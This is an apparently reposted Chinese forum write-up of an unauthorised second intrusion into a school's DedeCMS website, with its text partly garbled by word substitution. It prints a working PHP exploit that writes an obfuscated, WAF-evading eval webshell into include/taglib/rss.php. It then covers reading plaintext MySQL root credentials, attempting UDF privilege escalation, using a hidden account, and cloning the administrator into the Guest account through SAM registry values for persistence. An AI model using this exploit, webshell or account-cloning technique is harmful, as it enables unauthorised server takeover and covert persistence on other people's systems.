来源:http://bbs.ichunqiu.com/thread-17002-1-1.html

00x01

话说在上次对已经要去的学习进行渗透测试后善良的我把洞丢给了老师(网站出问题了,老师找到我身上,不得不给!


)为此,我跟老师成为了快乐的好基友,以至于我的权限掉了,这让我非常不愉快,于是乎,又进行了二次渗透!
并且这次我准备长期维权!

friendlinkmainphp二次渗入渗出已经到了的黉舍在次提权到克隆治理员 GraphQL

00x02

目标站:www.xxx.com//全程马赛克

Cms:二次开拓dedecms

版本:20140814(在自己嘴残的情形下把自己所知道的洞都给说出去了,然后补了。
)

利用nikto等工具扫均未果,在准备丢bugscan的时候想起土司大佬的文章,于是乎就开干了。

漏洞文件地址:/plus/flink_add.php

并且exp也已经公布,但是经由我的提醒后老师可能装了360等waf,我须要大致的修正下exp

Exp:

[PHP] 纯文本查看 复制代码

?

01020304050607080910111213<?php//print_r($_SERVER);$referer = $_SERVER['HTTP_REFERER'];$dede_login = str_replace(\公众friendlink_main.php\"大众,\"大众\公众,$referer);//去掉friendlink_main.php,取得dede后台的路径//拼接 exp$muma='<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'&gt;';$exp='tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=rss.php';$url = $dede_login.$exp;//echo $url;header(\"大众location: \"大众.$url);// send mail coderexit();?>

这里可以瞥见$muma哪里的内容为<?php @eval($_POST[‘x’]; )?>然后用’.’分割开来的,按葫芦画瓢,布局一个过waf的一句即可

ps:$muma = '<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'>';

触发的时候会天生一个:include/taglib/rss.php

丢到一个站上准备套路老师(由于有权限写的,老师不会上当了。


以是用小号还原下当时情形)

看样子已经触发了,访问下文件

文件存在,菜刀连接之~

熟习的界面,连续探求mysql root账号,在提权一次

这次pass竟然直接是明文,并且直接便是root,大吃一惊- -# 看来他以为不会再有人进来了,不过挺好,估计内部的洞都没修复。
那么不用阐明了,上大马,开车

Mysql版本:5.5.35

彷佛跟以前没什么两样,那么先找一下路径好用来导出udf

安装路径:D:/MySQL/MySQL Server 5.5/,咦,安装路径变了

好吧,直接提权,先导出dll

导出成功,实行语句

这个版本的马创造导出成功了并不能实行命令,于是乎我又换了一个版本的马

What? 这次连导出也不能?吓得我去看了下目录

以为重命名不可覆盖,我又换了好几个名字创造确实写进去了。

然而却不能调用,于是抽支烟压压惊先

溘然,猛地想起,我把web的权限已经提升为管理员了,该当可以直接实行命令

权限给降下来了,表示懵逼- -# 该怎么办呢?

然后,奇迹涌现了,我的隐蔽用户没被删,直接上岸做事器~~~~(大翻车)

创造没权限,于是乎又开始绕- -#

以管理员运行就有权限了

于是乎开始抓

既然说留权限,那么就克隆一个administrator吧

依次进入注册表HKEY_LOCAL_MACHINE---->SAM---->SAM

默认是没读取权限的

依次单击“查看”菜单----“刷新”,可以看到SAM下面的子项已经出来了。

进入到Users目录

可以瞥见,administrator对应着01F4

把F值保存一下,在找到guest对应的F值,复制进去就可以了

然后启动下Guset用户就可以了,当然,可以利用ca等工具更快捷

由于用户不能添加到管理组,以是才克隆用户,这个在上次渗透中有提到过。
其余便是管理组克隆可以用来创建超级隐蔽用户等姿势。